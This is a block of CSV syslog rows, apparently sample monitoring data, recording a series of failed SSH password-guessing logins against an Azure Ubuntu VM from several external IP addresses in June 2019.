+8831,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:00:26,UbuntuDevEnv,2019-06-25 22:00:26,auth,UbuntuDevEnv,info,Disconnected from invalid user cou 134.209.233.74 port 59588 [preauth],38799,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cou,134.209.233.7,59588,,
+8832,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:00:42,UbuntuDevEnv,2019-06-25 22:00:42,auth,UbuntuDevEnv,info,Invalid user minecraft from 212.156.136.114 port 56142,38924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,minecraft,212.156.136.1,56142,,
+8833,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:00:42,UbuntuDevEnv,2019-06-25 22:00:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=212.156.136.114,38924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,212.156.136.1,,0,
+8834,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:00:42,UbuntuDevEnv,2019-06-25 22:00:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8835,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:00:45,UbuntuDevEnv,2019-06-25 22:00:44,auth,UbuntuDevEnv,info,Failed password for invalid user minecraft from 212.156.136.114 port 56142 ssh2,38924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,minecraft,212.156.136.1,56142,,
+8836,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:00:45,UbuntuDevEnv,2019-06-25 22:00:44,auth,UbuntuDevEnv,info,Received disconnect from 212.156.136.114 port 56142:11: Bye Bye [preauth],38924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,56142,,
+8837,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:00:45,UbuntuDevEnv,2019-06-25 22:00:44,auth,UbuntuDevEnv,info,Disconnected from invalid user minecraft 212.156.136.114 port 56142 [preauth],38924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,minecraft,212.156.136.1,56142,,
+8838,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:01:53,UbuntuDevEnv,2019-06-25 22:01:52,auth,UbuntuDevEnv,info,Invalid user ftpuser from 134.209.233.74 port 48414,39176,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,134.209.233.7,48414,,
+8839,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:01:53,UbuntuDevEnv,2019-06-25 22:01:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=134.209.233.74,39176,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,134.209.233.7,,0,
+8840,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:01:53,UbuntuDevEnv,2019-06-25 22:01:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39176,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8841,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:01:55,UbuntuDevEnv,2019-06-25 22:01:54,auth,UbuntuDevEnv,info,Failed password for invalid user ftpuser from 134.209.233.74 port 48414 ssh2,39176,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,134.209.233.7,48414,,
+8842,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:01:55,UbuntuDevEnv,2019-06-25 22:01:54,auth,UbuntuDevEnv,info,Received disconnect from 134.209.233.74 port 48414:11: Bye Bye [preauth],39176,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.233.7,48414,,
+8843,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:01:55,UbuntuDevEnv,2019-06-25 22:01:54,auth,UbuntuDevEnv,info,Disconnected from invalid user ftpuser 134.209.233.74 port 48414 [preauth],39176,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,134.209.233.7,48414,,
+8844,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:01:58,UbuntuDevEnv,2019-06-25 22:01:57,auth,UbuntuDevEnv,info,Invalid user jumam from 132.232.40.86 port 60872,39190,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jumam,132.232.40.8,60872,,
+8845,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:01:58,UbuntuDevEnv,2019-06-25 22:01:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39190,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8846,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:01:58,UbuntuDevEnv,2019-06-25 22:01:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=132.232.40.86,39190,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,132.232.40.8,,0,
+8847,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:02:00,UbuntuDevEnv,2019-06-25 22:01:59,auth,UbuntuDevEnv,info,Failed password for invalid user jumam from 132.232.40.86 port 60872 ssh2,39190,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jumam,132.232.40.8,60872,,
+8848,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:02:00,UbuntuDevEnv,2019-06-25 22:02:00,auth,UbuntuDevEnv,info,Received disconnect from 132.232.40.86 port 60872:11: Bye Bye [preauth],39190,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,132.232.40.8,60872,,
+8849,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:02:00,UbuntuDevEnv,2019-06-25 22:02:00,auth,UbuntuDevEnv,info,Disconnected from invalid user jumam 132.232.40.86 port 60872 [preauth],39190,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jumam,132.232.40.8,60872,,
+8850,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:02:03,UbuntuDevEnv,2019-06-25 22:02:03,auth,UbuntuDevEnv,info,Invalid user factorio from 165.22.96.224 port 36226,39215,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,factorio,165.22.96.2,36226,,
+8851,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:02:03,UbuntuDevEnv,2019-06-25 22:02:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39215,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8852,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:02:03,UbuntuDevEnv,2019-06-25 22:02:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.96.224,39215,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.96.2,,0,
+8853,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:02:05,UbuntuDevEnv,2019-06-25 22:02:05,auth,UbuntuDevEnv,info,Failed password for invalid user factorio from 165.22.96.224 port 36226 ssh2,39215,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,factorio,165.22.96.2,36226,,
+8854,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:02:06,UbuntuDevEnv,2019-06-25 22:02:05,auth,UbuntuDevEnv,info,Disconnected from invalid user factorio 165.22.96.224 port 36226 [preauth],39215,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,factorio,165.22.96.2,36226,,
+8855,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:02:06,UbuntuDevEnv,2019-06-25 22:02:05,auth,UbuntuDevEnv,info,Received disconnect from 165.22.96.224 port 36226:11: Bye Bye [preauth],39215,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.96.2,36226,,
+8856,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:02:14,UbuntuDevEnv,2019-06-25 22:02:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=212.156.136.114  user=syslog,39265,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,syslog,212.156.136.1,,0,
+8857,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:02:16,UbuntuDevEnv,2019-06-25 22:02:15,auth,UbuntuDevEnv,info,Failed password for syslog from 212.156.136.114 port 64237 ssh2,39265,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,64237,,
+8858,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:02:16,UbuntuDevEnv,2019-06-25 22:02:15,auth,UbuntuDevEnv,info,Received disconnect from 212.156.136.114 port 64237:11: Bye Bye [preauth],39265,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,64237,,
+8859,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:02:16,UbuntuDevEnv,2019-06-25 22:02:15,auth,UbuntuDevEnv,info,Disconnected from authenticating user syslog 212.156.136.114 port 64237 [preauth],39265,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,syslog,212.156.136.1,64237,,
+8860,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:03:19,UbuntuDevEnv,2019-06-25 22:03:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=134.209.233.74  user=root,39491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,134.209.233.7,,0,
+8861,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:03:22,UbuntuDevEnv,2019-06-25 22:03:22,auth,UbuntuDevEnv,info,Failed password for root from 134.209.233.74 port 37240 ssh2,39491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.233.7,37240,,
+8862,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:03:22,UbuntuDevEnv,2019-06-25 22:03:22,auth,UbuntuDevEnv,info,Received disconnect from 134.209.233.74 port 37240:11: Bye Bye [preauth],39491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.233.7,37240,,
+8863,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:03:22,UbuntuDevEnv,2019-06-25 22:03:22,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 134.209.233.74 port 37240 [preauth],39491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,134.209.233.7,37240,,
+8864,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:03:44,UbuntuDevEnv,2019-06-25 22:03:44,auth,UbuntuDevEnv,info,Invalid user nue from 165.22.96.224 port 54624,39579,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nue,165.22.96.2,54624,,
+8865,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:03:44,UbuntuDevEnv,2019-06-25 22:03:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39579,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8866,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:03:44,UbuntuDevEnv,2019-06-25 22:03:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.96.224,39579,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.96.2,,0,
+8867,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:03:46,UbuntuDevEnv,2019-06-25 22:03:46,auth,UbuntuDevEnv,info,Failed password for invalid user nue from 165.22.96.224 port 54624 ssh2,39579,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nue,165.22.96.2,54624,,
+8868,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:03:46,UbuntuDevEnv,2019-06-25 22:03:46,auth,UbuntuDevEnv,info,Received disconnect from 165.22.96.224 port 54624:11: Bye Bye [preauth],39579,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.96.2,54624,,
+8869,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:03:46,UbuntuDevEnv,2019-06-25 22:03:46,auth,UbuntuDevEnv,info,Disconnected from invalid user nue 165.22.96.224 port 54624 [preauth],39579,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nue,165.22.96.2,54624,,
+8870,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:03:47,UbuntuDevEnv,2019-06-25 22:03:47,auth,UbuntuDevEnv,info,Invalid user vision from 212.156.136.114 port 28378,39589,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vision,212.156.136.1,28378,,
+8871,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:03:47,UbuntuDevEnv,2019-06-25 22:03:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39589,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8872,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:03:47,UbuntuDevEnv,2019-06-25 22:03:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=212.156.136.114,39589,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,212.156.136.1,,0,
+8873,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:03:49,UbuntuDevEnv,2019-06-25 22:03:49,auth,UbuntuDevEnv,info,Failed password for invalid user vision from 212.156.136.114 port 28378 ssh2,39589,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vision,212.156.136.1,28378,,
+8874,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:03:49,UbuntuDevEnv,2019-06-25 22:03:49,auth,UbuntuDevEnv,info,Disconnected from invalid user vision 212.156.136.114 port 28378 [preauth],39589,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vision,212.156.136.1,28378,,
+8875,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:03:49,UbuntuDevEnv,2019-06-25 22:03:49,auth,UbuntuDevEnv,info,Received disconnect from 212.156.136.114 port 28378:11: Bye Bye [preauth],39589,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,28378,,
+8876,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:04:01,UbuntuDevEnv,2019-06-25 22:04:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=132.232.40.86  user=test,39634,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,132.232.40.8,,0,
+8877,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:04:03,UbuntuDevEnv,2019-06-25 22:04:03,auth,UbuntuDevEnv,info,Failed password for test from 132.232.40.86 port 52184 ssh2,39634,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,132.232.40.8,52184,,
+8878,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:04:04,UbuntuDevEnv,2019-06-25 22:04:03,auth,UbuntuDevEnv,info,Received disconnect from 132.232.40.86 port 52184:11: Bye Bye [preauth],39634,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,132.232.40.8,52184,,
+8879,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:04:04,UbuntuDevEnv,2019-06-25 22:04:03,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 132.232.40.86 port 52184 [preauth],39634,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,132.232.40.8,52184,,
+8880,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:04:40,UbuntuDevEnv,2019-06-25 22:04:40,auth,UbuntuDevEnv,info,Invalid user dev from 134.209.233.74 port 54296,39778,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dev,134.209.233.7,54296,,
+8881,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:04:40,UbuntuDevEnv,2019-06-25 22:04:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39778,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8882,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:04:40,UbuntuDevEnv,2019-06-25 22:04:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=134.209.233.74,39778,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,134.209.233.7,,0,
+8883,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:04:41,UbuntuDevEnv,2019-06-25 22:04:41,auth,UbuntuDevEnv,info,Failed password for invalid user dev from 134.209.233.74 port 54296 ssh2,39778,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dev,134.209.233.7,54296,,
+8884,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:04:41,UbuntuDevEnv,2019-06-25 22:04:41,auth,UbuntuDevEnv,info,Disconnected from invalid user dev 134.209.233.74 port 54296 [preauth],39778,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dev,134.209.233.7,54296,,
+8885,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:04:41,UbuntuDevEnv,2019-06-25 22:04:41,auth,UbuntuDevEnv,info,Received disconnect from 134.209.233.74 port 54296:11: Bye Bye [preauth],39778,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.233.7,54296,,
+8886,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:05:17,UbuntuDevEnv,2019-06-25 22:05:16,auth,UbuntuDevEnv,info,Invalid user vagrant from 212.156.136.114 port 26921,39912,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vagrant,212.156.136.1,26921,,
+8887,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:05:17,UbuntuDevEnv,2019-06-25 22:05:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=212.156.136.114,39912,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,212.156.136.1,,0,
+8888,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:05:17,UbuntuDevEnv,2019-06-25 22:05:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39912,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8889,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:05:19,UbuntuDevEnv,2019-06-25 22:05:18,auth,UbuntuDevEnv,info,Failed password for invalid user vagrant from 212.156.136.114 port 26921 ssh2,39912,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vagrant,212.156.136.1,26921,,
+8890,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:05:19,UbuntuDevEnv,2019-06-25 22:05:18,auth,UbuntuDevEnv,info,Disconnected from invalid user vagrant 212.156.136.114 port 26921 [preauth],39912,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vagrant,212.156.136.1,26921,,
